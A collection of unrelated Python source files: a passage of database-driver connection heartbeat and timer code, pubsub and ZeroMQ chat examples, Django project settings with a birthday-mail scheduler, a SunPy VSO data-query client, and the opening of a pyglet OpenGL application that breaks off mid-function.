with self.connection.lock:
self.connection.in_flight -= 1
if isinstance(response, Exception):
if hasattr(response, 'to_exception'):
response = response.to_exception()
if self.fail_on_error:
self.error = response
self.event.set()
else:
self.responses[index] = (False, response)
else:
if not self.fail_on_error:
self.responses[index] = (True, response)
else:
self.responses[index] = response
self.pending -= 1
if not self.pending:
self.event.set()
def deliver(self, timeout=None):
"""
If fail_on_error was set to False, a list of (success, response)
tuples will be returned. If success is False, response will be
an Exception. Otherwise, response will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised. Otherwise,
the normal response will be returned.
"""
self.event.wait(timeout)
if self.error:
raise self.error
elif not self.event.is_set():
raise OperationTimedOut()
else:
return self.responses
class HeartbeatFuture(object):
def __init__(self, connection, owner):
self._exception = None
self._event = Event()
self.connection = connection
self.owner = owner
log.debug("Sending options message heartbeat on idle connection (%s) %s",
id(connection), connection.host)
with connection.lock:
if connection.in_flight <= connection.max_request_id:
connection.in_flight += 1
connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback)
else:
self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold")
self._event.set()
def wait(self, timeout):
self._event.wait(timeout)
if self._event.is_set():
if self._exception:
raise self._exception
else:
raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.host)
def _options_callback(self, response):
if isinstance(response, SupportedMessage):
log.debug("Received options response on connection (%s) from %s",
id(self.connection), self.connection.host)
else:
if isinstance(response, ConnectionException):
self._exception = response
else:
self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s"
% (response,))
self._event.set()
class ConnectionHeartbeat(Thread):
def __init__(self, interval_sec, get_connection_holders, timeout):
Thread.__init__(self, name="Connection heartbeat")
self._interval = interval_sec
self._timeout = timeout
self._get_connection_holders = get_connection_holders
self._shutdown_event = Event()
self.daemon = True
self.start()
class ShutdownException(Exception):
pass
def run(self):
self._shutdown_event.wait(self._interval)
while not self._shutdown_event.is_set():
start_time = time.time()
futures = []
failed_connections = []
try:
for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]:
for connection in connections:
self._raise_if_stopped()
if not (connection.is_defunct or connection.is_closed):
if connection.is_idle:
try:
futures.append(HeartbeatFuture(connection, owner))
except Exception as e:
log.warning("Failed sending heartbeat message on connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((connection, owner, e))
else:
connection.reset_idle()
else:
log.debug("Cannot send heartbeat message on connection (%s) to %s",
id(connection), connection.host)
                            # make sure the owner sees this defunct/closed connection
owner.return_connection(connection)
self._raise_if_stopped()
# Wait max `self._timeout` seconds for all HeartbeatFutures to complete
timeout = self._timeout
start_time = time.time()
for f in futures:
self._raise_if_stopped()
connection = f.connection
try:
f.wait(timeout)
# TODO: move this, along with connection locks in pool, down into Connection
with connection.lock:
connection.in_flight -= 1
connection.reset_idle()
except Exception as e:
log.warning("Heartbeat failed for connection (%s) to %s",
id(connection), connection.host)
failed_connections.append((f.connection, f.owner, e))
timeout = self._timeout - (time.time() - start_time)
for connection, owner, exc in failed_connections:
self._raise_if_stopped()
if not connection.is_control_connection:
# Only HostConnection supports shutdown_on_error
owner.shutdown_on_error = True
connection.defunct(exc)
owner.return_connection(connection)
except self.ShutdownException:
pass
except Exception:
log.error("Failed connection heartbeat", exc_info=True)
elapsed = time.time() - start_time
self._shutdown_event.wait(max(self._interval - elapsed, 0.01))
def stop(self):
self._shutdown_event.set()
self.join()
def _raise_if_stopped(self):
if self._shutdown_event.is_set():
raise self.ShutdownException()
class Timer(object):
canceled = False
def __init__(self, timeout, callback):
self.end = time.time() + timeout
self.callback = callback
def __lt__(self, other):
return self.end < other.end
def cancel(self):
self.canceled = True
def finish(self, time_now):
if self.canceled:
return True
if time_now >= self.end:
self.callback()
return True
return False
class TimerManager(object):
def __init__(self):
self._queue = []
self._new_timers = []
def add_timer(self, timer):
"""
called from client thread with a Timer object
"""
self._new_timers.append((timer.end, timer))
def service_timeouts(self):
"""
run callbacks on all expired timers
Called from the event thread
:return: next end time, or None
"""
queue = self._queue
if self._new_timers:
new_timers = self._new_timers
while new_timers:
heappush(queue, new_timers.pop())
if queue:
now = time.time()
while queue:
try:
timer = queue[0][1]
if timer.finish(now):
heappop(queue)
else:
return timer.end
except Exception:
log.exception("Exception while servicing timeout callback: ")
@property
def next_timeout(self):
try:
return self._queue[0][0]
except IndexError:
pass
|
pubsub.py
|
import time
import threading
from space_api import API
api = API('books-app', 'localhost:4124')
pubsub = api.pubsub()
def on_receive(subject, msg):
print("received", subject, msg)
subscription = pubsub.subscribe("/subject/", on_receive)
print(subscription)
def publish():
for i in range(30):
msg = [1, "adf", 5.2, True, {"k": "v"}, [1, "b"]]
print("publishing", msg, pubsub.publish("/subject/a/", msg))
time.sleep(2)
thread = threading.Thread(target=publish)
thread.start()
thread.join()
subscription.unsubscribe()
api.close()
|
zmq_example.py
|
#!/usr/bin/env python3
# A simple "chat" program to demonstrate the use of ZeroMQ interface
# with the modem application.
# Since the modem currently supports only fixed-length frames,
# they are padded with spaces and stripped after receiving.
FRAME_LENGTH = 100
import zmq, threading, struct
ctx = zmq.Context()
rx = ctx.socket(zmq.SUB)
rx.connect("tcp://localhost:43300")
rx.setsockopt(zmq.SUBSCRIBE, b"")
tx = ctx.socket(zmq.PUB)
tx.connect("tcp://localhost:43301")
def rx_loop():
while True:
rxmsg = rx.recv()
# Parse metadata from the message
metadata = struct.unpack('IIQIffffffffffI', rxmsg[0:64])
timestamp = metadata[2]
data = rxmsg[64:]
# Print it with a timestamp
print("\033[034m%10.2f s: \033[033m%s\033[0m" % (1e-9 * timestamp, data.decode('utf-8','ignore').strip()))
rxthread = threading.Thread(target=rx_loop, daemon=True)
rxthread.start()
while True:
txtext = input()
txpayload = txtext.encode('utf-8','ignore')
    # Truncate an over-long payload, pad a short one to FRAME_LENGTH.
if len(txpayload) >= FRAME_LENGTH:
txframe = txpayload[0:FRAME_LENGTH]
else:
txframe = txpayload + b' ' * (FRAME_LENGTH-len(txpayload))
# Add metadata and send it
tx.send(struct.pack('IIQIffffffffffI', 0, 0, 0, 0, 0,0,0,0, 0,0,0,0,0,0, len(txframe)) + txframe)
|
settings_20210906114611.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task to run every day at 11:47
schedule.every().day.at("11:47").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
__init__.py
|
# -*- coding: utf-8 -*-
# Author: Florian Mayer <florian.mayer@bitsrc.org>
#
# This module was developed with funding provided by
# the ESA Summer of Code (2011).
#
#pylint: disable=W0401,C0103,R0904,W0141
"""
This module provides a wrapper around the VSO API.
"""
from __future__ import absolute_import
import re
import os
import sys
import random
import tempfile
import threading
from datetime import datetime, timedelta
from functools import partial
from collections import defaultdict
from string import ascii_lowercase
from suds import client, TypeNotFound
from sunpy.net import download
from sunpy.net.util import get_filename, slugify
from sunpy.net.attr import and_, Attr
from sunpy.net.vso import attrs
from sunpy.net.vso.attrs import walker, TIMEFORMAT
from sunpy.util.util import to_angstrom, print_table, replacement_filename
from sunpy.time import parse_time
DEFAULT_URL = 'http://docs.virtualsolar.org/WSDL/VSOi_rpc_literal.wsdl'
DEFAULT_PORT = 'nsoVSOi'
RANGE = re.compile(r'(\d+)(\s*-\s*(\d+))?(\s*([a-zA-Z]+))?')
# TODO: Name
class NoData(Exception):
""" Risen for callbacks of VSOClient that are unable to supply
information for the request. """
pass
class _Str(str):
""" Subclass of string that contains a meta attribute for the
record_item associated with the file. """
pass
# ----------------------------------------
class Results(object):
""" Returned by VSOClient.get. Use .wait to wait
for completion of download.
"""
def __init__(self, callback, n=0, done=None):
self.callback = callback
self.n = n
self.map_ = {}
self.done = done
self.evt = threading.Event()
self.errors = []
def submit(self, keys, value):
"""
Parameters
----------
keys : list
names under which to save the value
value : object
value to save
"""
for key in keys:
self.map_[key] = value
self.poke()
    def poke(self):
        """ Signal completion of one item that was waited for. This can be
        because it was submitted, because it led to an error or for any
        other reason. """
        self.n -= 1
if not self.n:
if self.done is not None:
self.map_ = self.done(self.map_)
self.callback(self.map_)
self.evt.set()
def require(self, keys):
""" Require that keys be submitted before the Results object is
finished (i.e., wait returns). Returns a callback method that can
be used to submit the result by simply calling it with the result.
keys : list
name of keys under which to save the result
"""
self.n += 1
return partial(self.submit, keys)
def wait(self, timeout=100):
""" Wait for result to be complete and return it. """
        # Giving wait a timeout works around a CPython bug that would
        # otherwise make the call uninterruptible.
while not self.evt.wait(timeout):
pass
return self.map_
def add_error(self, exception):
""" Signal a required result cannot be submitted because of an
error. """
self.errors.append(exception)
self.poke()
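# Illustrative sketch (not part of the original module): how the Results helper
# above is typically driven. All names below are hypothetical; the function is
# defined but never called.
def _example_results_usage():
    collected = []
    res = Results(collected.append, n=1)  # n=1: one slot stays open until the final poke()
    cb = res.require(['item-1'])          # reserve a key and get a submit callback
    cb('value-1')                         # submitting fills the key and pokes once
    res.poke()                            # release the initial slot
    return res.wait()                     # -> {'item-1': 'value-1'}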
def _parse_waverange(string):
    min_, max_, unit = RANGE.match(string).groups()[::2]
return {
'wave_wavemin': min_,
'wave_wavemax': min_ if max_ is None else max_,
'wave_waveunit': 'Angstrom' if unit is None else unit,
}
def _parse_date(string):
start, end = string.split(' - ')
return {'time_start': start.strip(), 'time_end': end.strip()}
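# Illustrative examples (not part of the original module), assuming the
# RANGE.match(string).groups()[::2] form used above:
#   _parse_waverange('171')            -> {'wave_wavemin': '171', 'wave_wavemax': '171', 'wave_waveunit': 'Angstrom'}
#   _parse_waverange('171 - 195 GHz')  -> {'wave_wavemin': '171', 'wave_wavemax': '195', 'wave_waveunit': 'GHz'}
#   _parse_date('2010/1/1 - 2010/1/2') -> {'time_start': '2010/1/1', 'time_end': '2010/1/2'}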
def iter_records(response):
for prov_item in response.provideritem:
if not hasattr(prov_item, 'record') or not prov_item.record:
continue
for record_item in prov_item.record.recorditem:
yield record_item
def iter_errors(response):
for prov_item in response.provideritem:
if not hasattr(prov_item, 'record') or not prov_item.record:
yield prov_item
class QueryResponse(list):
def __init__(self, lst, queryresult=None):
super(QueryResponse, self).__init__(lst)
self.queryresult = queryresult
self.errors = []
def query(self, *query):
""" Furtherly reduce the query response by matching it against
another query, e.g. response.query(attrs.Instrument('aia')). """
query = and_(*query)
return QueryResponse(
attrs.filter_results(query, self), self.queryresult
)
@classmethod
def create(cls, queryresult):
return cls(iter_records(queryresult), queryresult)
def total_size(self):
""" Total size of data in KB. May be less than the actual
size because of inaccurate data providers. """
# Warn about -1 values?
return sum(record.size for record in self if record.size > 0)
def num_records(self):
""" Return number of records. """
return len(self)
def time_range(self):
""" Return total time-range all records span across. """
return (
datetime.strptime(
min(record.time.start for record in self), TIMEFORMAT),
datetime.strptime(
max(record.time.end for record in self), TIMEFORMAT)
)
def show(self):
"""Print out human-readable summary of records retrieved"""
table = [[str(datetime.strptime(record.time.start, TIMEFORMAT)),
str(datetime.strptime(record.time.end, TIMEFORMAT)),
record.source,
record.instrument,
record.extent.type] for record in self]
table.insert(0, ['----------','--------','------','----------','----'])
table.insert(0, ['Start time','End time','Source','Instrument','Type'])
print(print_table(table, colsep = ' ', linesep='\n'))
def add_error(self, exception):
self.errors.append(exception)
class DownloadFailed(Exception):
pass
class MissingInformation(Exception):
pass
class UnknownMethod(Exception):
pass
class MultipleChoices(Exception):
pass
class UnknownVersion(Exception):
pass
class UnknownStatus(Exception):
pass
class VSOClient(object):
""" Main VSO Client. """
method_order = [
'URL-TAR_GZ', 'URL-ZIP', 'URL-TAR', 'URL-FILE', 'URL-packaged'
]
def __init__(self, url=None, port=None, api=None):
if api is None:
if url is None:
url = DEFAULT_URL
if port is None:
port = DEFAULT_PORT
api = client.Client(url)
api.set_options(port=port)
self.api = api
def make(self, type_, **kwargs):
obj = self.api.factory.create(type_)
for k, v in kwargs.iteritems():
split = k.split('__')
tip = split[-1]
rest = split[:-1]
item = obj
for elem in rest:
item = item[elem]
if isinstance(v, dict):
# Do not throw away type information for dicts.
                for kk, vv in v.iteritems():
                    item[tip][kk] = vv
else:
item[tip] = v
return obj
def query(self, *query):
""" Query data from the VSO with the new API. Takes a variable number
of attributes as parameter, which are chained together using AND.
The new query language allows complex queries to be easily formed.
Examples
--------
Query all data from eit or aia between 2010-01-01T00:00 and
2010-01-01T01:00.
>>> client.query(
... vso.Time(datetime(2010, 1, 1), datetime(2010, 1, 1, 1)),
... vso.Instrument('eit') | vso.Instrument('aia')
... )
Returns
-------
        out : :py:class:`QueryResponse` (enhanced list) of matched items.
"""
query = and_(*query)
responses = []
for block in walker.create(query, self.api):
try:
responses.append(
self.api.service.Query(
self.make('QueryRequest', block=block)
)
)
except TypeNotFound:
pass
except Exception as ex:
response = QueryResponse.create(self.merge(responses))
response.add_error(ex)
return QueryResponse.create(self.merge(responses))
def merge(self, queryresponses):
if len(queryresponses) == 1:
return queryresponses[0]
fileids = set()
providers = {}
for queryresponse in queryresponses:
for provideritem in queryresponse.provideritem:
provider = provideritem.provider
if not hasattr(provideritem, 'record'):
continue
if not hasattr(provideritem.record, 'recorditem'):
continue
if not provideritem.provider in providers:
providers[provider] = provideritem
fileids |= set(
record_item.fileid
for record_item in provideritem.record.recorditem
)
else:
for record_item in provideritem.record.recorditem:
if record_item.fileid not in fileids:
fileids.add(record_item.fileid)
providers[provider].record.recorditem.append(
record_item
)
providers[provider].no_of_records_found += 1
providers[provider].no_of_records_returned += 1
return self.make('QueryResponse', provideritem=providers.values())
@staticmethod
def mk_filename(pattern, response, sock, url, overwrite=False):
name = get_filename(sock, url)
if not name:
if not isinstance(response.fileid, unicode):
name = unicode(response.fileid, "ascii", "ignore")
else:
name = response.fileid
fs_encoding = sys.getfilesystemencoding()
if fs_encoding is None:
fs_encoding = "ascii"
name = name.encode(fs_encoding, "ignore")
if not name:
name = "file"
fname = pattern.format(file=name, **dict(response))
if not overwrite and os.path.exists(fname):
fname = replacement_filename(fname)
dir_ = os.path.dirname(fname)
if not os.path.exists(dir_):
os.makedirs(dir_)
return fname
# pylint: disable=R0914
def query_legacy(self, tstart=None, tend=None, **kwargs):
"""
        Query data from the VSO, mimicking the IDL API as closely as possible.
Either tstart and tend or date_start and date_end or date have
to be supplied.
Parameters
----------
tstart : datetime.datetime
Start of the time-range in which records are searched.
        tend : datetime.datetime
            End of the time-range in which records are searched.
date : str
(start date) - (end date)
start_date : datetime
the start date
end_date : datetime
the end date
wave : str
(min) - (max) (unit)
min_wave : str
minimum spectral range
max_wave : str
maximum spectral range
unit_wave : str
spectral range units (Angstrom, GHz, keV)
extent : str
VSO 'extent type' ... (FULLDISK, CORONA, LIMB, etc)
physobj : str
VSO 'physical observable'
provider : str
VSO ID for the data provider (SDAC, NSO, SHA, MSU, etc)
source : str
spacecraft or observatory (SOHO, YOHKOH, BBSO, etc)
synonyms : spacecraft, observatory
instrument : str
instrument ID (EIT, SXI-0, SXT, etc)
synonyms : telescope, inst
detector : str
detector ID (C3, EUVI, COR2, etc.)
layout : str
layout of the data (image, spectrum, time_series, etc.)
level : str
level of the data product (numeric range, see below)
pixels : str
number of pixels (numeric range, see below)
resolution : str
effective resolution (1 = full, 0.5 = 2x2 binned, etc)
numeric range, see below.
pscale : str
pixel scale, in arcseconds (numeric range, see below)
near_time : datetime
return record closest to the time. See below.
sample : int
attempt to return only one record per SAMPLE seconds. See below.
Numeric Ranges:
- May be entered as a string or any numeric type for equality matching
- May be a string of the format '(min) - (max)' for range matching
- May be a string of the form '(operator) (number)' where operator is one of: lt gt le ge < > <= >=
Examples
--------
Query all data from eit between 2010-01-01T00:00 and
2010-01-01T01:00.
>>> qr = client.query_legacy(
... datetime(2010, 1, 1), datetime(2010, 1, 1, 1), instrument='eit')
Returns
-------
        out : :py:class:`QueryResponse` (enhanced list) of matched items. Return value of same type as that of :py:meth:`VSOClient.query`.
"""
sdk = lambda key: lambda value: {key: value}
ALIASES = {
'wave_min': sdk('wave_wavemin'),
'wave_max': sdk('wave_wavemax'),
'wave_type': sdk('wave_wavetype'),
'wave_unit': sdk('wave_waveunit'),
'min_wave': sdk('wave_wavemin'),
'max_wave': sdk('wave_wavemax'),
'type_wave': sdk('wave_wavetype'),
'unit_wave': sdk('wave_waveunit'),
'wave': _parse_waverange,
'inst': sdk('instrument'),
'telescope': sdk('instrument'),
'spacecraft': sdk('source'),
'observatory': sdk('source'),
'start_date': sdk('time_start'),
'end_date': sdk('time_end'),
'start': sdk('time_start'),
'end': sdk('time_end'),
'near_time': sdk('time_near'),
'date': _parse_date,
'layout': sdk('datatype'),
}
kwargs.update({'time_start': tstart, 'time_end': tend})
queryreq = self.api.factory.create('QueryRequest')
for key, value in kwargs.iteritems():
if key.startswith('time'):
value = parse_time(value).strftime(TIMEFORMAT)
for k, v in ALIASES.get(key, sdk(key))(value).iteritems():
attr = k.split('_')
lst = attr[-1]
rest = attr[:-1]
# pylint: disable=E1103
item = queryreq.block
for elem in rest:
try:
item = item[elem]
except KeyError:
raise ValueError("Unexpected argument %s." % key)
if lst not in item:
raise ValueError("Unexpected argument %s." % key)
if item[lst]:
raise ValueError("Got multiple values for %s." % k)
item[lst] = v
try:
return QueryResponse.create(self.api.service.Query(queryreq))
except TypeNotFound:
return QueryResponse([])
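    # Illustrative sketch (not part of the original module): the ALIASES table
    # above lets legacy keyword spellings map onto VSO query-block fields, e.g.
    #   client.query_legacy(datetime(2010, 1, 1), datetime(2010, 1, 2),
    #                       instrument='eit',           # -> block.instrument
    #                       wave='171 - 195 Angstrom',  # -> wave_wavemin/wavemax/waveunit via _parse_waverange
    #                       observatory='SOHO')         # -> block.source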
def latest(self):
""" Return newest record (limited to last week). """
return self.query_legacy(
datetime.utcnow() - timedelta(7),
datetime.utcnow(),
time_near=datetime.utcnow()
)
def get(self, query_response, path=None, methods=('URL-FILE',), downloader=None):
"""
Download data specified in the query_response.
Parameters
----------
query_response : sunpy.net.vso.QueryResponse
QueryResponse containing the items to be downloaded.
path : str
Specify where the data is to be downloaded. Can refer to arbitrary
fields of the QueryResponseItem (instrument, source, time, ...) via
string formatting, moreover the file-name of the file downloaded can
            be referred to as file, e.g.
"{source}/{instrument}/{time.start}/{file}".
methods : {list of str}
Methods acceptable to user.
downloader : sunpy.net.downloader.Downloader
Downloader used to download the data.
Returns
-------
out : :py:class:`Results` object that supplies a list of filenames with meta attributes containing the respective QueryResponse.
Examples
--------
>>> res = get(qr).wait()
"""
if downloader is None:
downloader = download.Downloader()
thread = threading.Thread(target=downloader.reactor.run)
thread.daemon = True
thread.start()
res = Results(
lambda _: downloader.reactor.stop(), 1,
lambda mp: self.link(query_response, mp)
)
else:
res = Results(
lambda _: None, 1, lambda mp: self.link(query_response, mp)
)
if path is None:
path = os.path.join(tempfile.mkdtemp(), '{file}')
fileids = VSOClient.by_fileid(query_response)
if not fileids:
res.poke()
return res
self.download_all(
self.api.service.GetData(
self.make_getdatarequest(query_response, methods)
),
methods, downloader, path,
fileids, res
)
res.poke()
return res
@staticmethod
def link(query_response, map_):
if not map_:
return []
ret = []
for record_item in query_response:
try:
item = _Str(map_[record_item.fileid]['path'])
except KeyError:
continue
# pylint: disable=W0201
item.meta = record_item
ret.append(item)
return ret
def make_getdatarequest(self, response, methods=None):
if methods is None:
methods = self.method_order + ['URL']
return self.create_getdatarequest(
dict((k, [x.fileid for x in v])
for k, v in self.by_provider(response).iteritems()),
methods
)
def create_getdatarequest(self, map_, methods, info=None):
if info is None:
info = {}
return self.make(
'VSOGetDataRequest',
request__method__methodtype=methods,
request__info=info,
request__datacontainer__datarequestitem=[
self.make('DataRequestItem', provider=k, fileiditem__fileid=[v])
for k, v in map_.iteritems()
]
)
# pylint: disable=R0913,R0912
def download_all(self, response, methods, dw, path, qr, res, info=None):
GET_VERSION = [
('0.8', (5, 8)),
('0.7', (1, 4)),
('0.6', (0, 3)),
]
for dresponse in response.getdataresponseitem:
for version, (from_, to) in GET_VERSION:
                if getattr(dresponse, 'version', '0.6') >= version:
break
else:
res.add_error(UnknownVersion(dresponse))
continue
# If from_ and to are uninitialized, the else block of the loop
# continues the outer loop and thus this code is never reached.
# pylint: disable=W0631
code = (
dresponse.status[from_:to]
if hasattr(dresponse, 'status') else '200'
)
if code == '200':
for dataitem in dresponse.getdataitem.dataitem:
try:
self.download(
dresponse.method.methodtype[0],
dataitem.url,
dw,
res.require(map(str, dataitem.fileiditem.fileid)),
res.add_error,
path,
qr[dataitem.fileiditem.fileid[0]]
)
except NoData:
res.add_error(DownloadFailed(dresponse))
continue
except Exception:
# FIXME: Is this a good idea?
res.add_error(DownloadFailed(dresponse))
elif code == '300' or code == '412' or code == '405':
if code == '300':
try:
methods = self.multiple_choices(
dresponse.method.methodtype, dresponse
)
except NoData:
res.add_error(MultipleChoices(dresponse))
continue
elif code == '412':
try:
info = self.missing_information(
info, dresponse.info
)
except NoData:
res.add_error(MissingInformation(dresponse))
continue
elif code == '405':
try:
methods = self.unknown_method(dresponse)
except NoData:
res.add_error(UnknownMethod(dresponse))
continue
files = []
for dataitem in dresponse.getdataitem.dataitem:
files.extend(dataitem.fileiditem.fileid)
request = self.create_getdatarequest(
{dresponse.provider: files}, methods, info
)
self.download_all(
self.api.service.GetData(request), methods, dw, path,
qr, res, info
)
else:
res.add_error(UnknownStatus(dresponse))
def download(self, method, url, dw, callback, errback, *args):
""" Override to costumize download action. """
if method.startswith('URL'):
return dw.reactor.call_sync(
partial(dw.download, url, partial(self.mk_filename, *args),
callback, errback)
)
raise NoData
@staticmethod
def by_provider(response):
map_ = defaultdict(list)
for record in response:
map_[record.provider].append(record)
return map_
@staticmethod
def by_fileid(response):
return dict(
(record.fileid, record) for record in response
)
# pylint: disable=W0613
def multiple_choices(self, choices, response):
""" Override to pick between multiple download choices. """
for elem in self.method_order:
if elem in choices:
return [elem]
raise NoData
# pylint: disable=W0613
def missing_information(self, info, field):
""" Override to provide missing information. """
raise NoData
# pylint: disable=W0613
def unknown_method(self, response):
""" Override to pick a new method if the current one is unknown. """
raise NoData
class InteractiveVSOClient(VSOClient):
""" Client for use in the REPL. Prompts user for data if required. """
def multiple_choices(self, choices, response):
while True:
for n, elem in enumerate(choices):
print "(%d) %s" % (n + 1, elem)
try:
choice = raw_input("Method number: ")
except KeyboardInterrupt:
raise NoData
if not choice:
raise NoData
try:
choice = int(choice) - 1
except ValueError:
continue
if choice == -1:
raise NoData
elif choice >= 0:
try:
return [choices[choice]]
except IndexError:
continue
def missing_information(self, info, field):
choice = raw_input(field + ': ')
if not choice:
raise NoData
return choice
def search(self, *args, **kwargs):
""" When passed an Attr object, perform new-style query;
otherwise, perform legacy query.
"""
if isinstance(args[0], Attr):
return self.query(*args)
else:
return self.query_legacy(*args, **kwargs)
def get(self, query_response, path=None, methods=('URL-FILE',), downloader=None):
if path is not None:
path = os.path.abspath(os.path.expanduser(path))
if os.path.exists(path) and os.path.isdir(path):
path = os.path.join(path, '{file}')
return VSOClient.get(self, query_response, path, methods, downloader)
g_client = None
def search(*args, **kwargs):
# pylint: disable=W0603
global g_client
if g_client is None:
g_client = InteractiveVSOClient()
return g_client.search(*args, **kwargs)
search.__doc__ = InteractiveVSOClient.search.__doc__
def get(query_response, path=None, methods=('URL-FILE',), downloader=None):
# pylint: disable=W0603
global g_client
if g_client is None:
g_client = InteractiveVSOClient()
return g_client.get(query_response, path, methods, downloader)
get.__doc__ = VSOClient.get.__doc__
if __name__ == "__main__":
from sunpy.net import vso
client = VSOClient()
result = client.query(
vso.attrs.Time((2011, 1, 1), (2011, 1, 1, 10)),
vso.attrs.Instrument('aia')
)
#res = client.get(result, path="/download/path").wait()
|
app.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import tricks
import rig
import time
from multiprocessing import Process, Manager
from pyglet.gl import *
from pyglet.window import key
from pyglet import clock
from tricks import *
from os.path import sep
from math import sqrt
from copy import deepcopy
import space
from layout import Camera
def setup_light():
""" Параметры источников света
ambient - фоновый (всенаправленный)
difuuze - диффузный направленный
specular - зеркальный
"""
glLightModelfv(GL_LIGHT_MODEL_AMBIENT, (GLfloat * 4)(0.3, 0.1, 0.1, 1.0))
    # do not light the inner surfaces of objects
glLightModeli(GL_LIGHT_MODEL_TWO_SIDE, GL_FALSE)
    # main light - yellowish
glLightfv(GL_LIGHT0, GL_DIFFUSE, (GLfloat * 4)(1.45, 1.45, 1.30, 1.00))
glLightfv(GL_LIGHT0, GL_AMBIENT, (GLfloat * 4)(0.30, 0.30, 0.30, 1.00))
glLightfv(GL_LIGHT0, GL_SPECULAR, (GLfloat * 4)(0.30, 0.30, 0.30, 1.00))
    # back light - gray
glLightfv(GL_LIGHT1, GL_DIFFUSE, (GLfloat * 4)(1.0, 1.0, 1.0, 1.0))
glLightfv(GL_LIGHT1, GL_AMBIENT, (GLfloat * 4)(0.0, 0.0, 0.0, 1.0))
glLightfv(GL_LIGHT1, GL_SPECULAR, (GLfloat * 4)(0.0, 0.0, 0.0, 1.0))
glEnable(GL_LIGHT0)
glEnable(GL_LIGHT1)
def set_light():
""" Позиция источников света
"""
glLightfv(GL_LIGHT0, GL_POSITION, glType(GLfloat, -6.0, 6.40, -5.5, 0.0))
glLightfv(GL_LIGHT1, GL_POSITION, glType(GLfloat, 5.0, -2.5, 6.0, 0.0))
def set_fog():
    glEnable(GL_FOG)                   # enable fog mode
    glFogi(GL_FOG_MODE, GL_LINEAR)     # fog blending law
    glFogf(GL_FOG_START, 60)           # fog start distance
    glFogf(GL_FOG_END, 100)            # fog end distance
    # haze color
    glFogfv(GL_FOG_COLOR, (GLfloat * 4)(0.5, 0.7, 1.0, 1))
    glFogf(GL_FOG_DENSITY, 0.7)        # fog density
    glHint(GL_FOG_HINT, GL_DONT_CARE)  # GL_DONT_CARE | GL_NICEST | GL_FASTEST
def set_2d():
width, height = window.get_size()
glDisable(GL_DEPTH_TEST)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, width, 0, height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glDisable(GL_LIGHTING)
def set_3d():
glEnable(GL_LIGHTING)
glEnable(GL_DEPTH_TEST)
glDepthFunc(GL_LESS)
glEnable(GL_CULL_FACE)
glFrontFace(GL_CCW)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION | GL_MODELVIEW)
glLoadIdentity()
width, height = window.get_size()
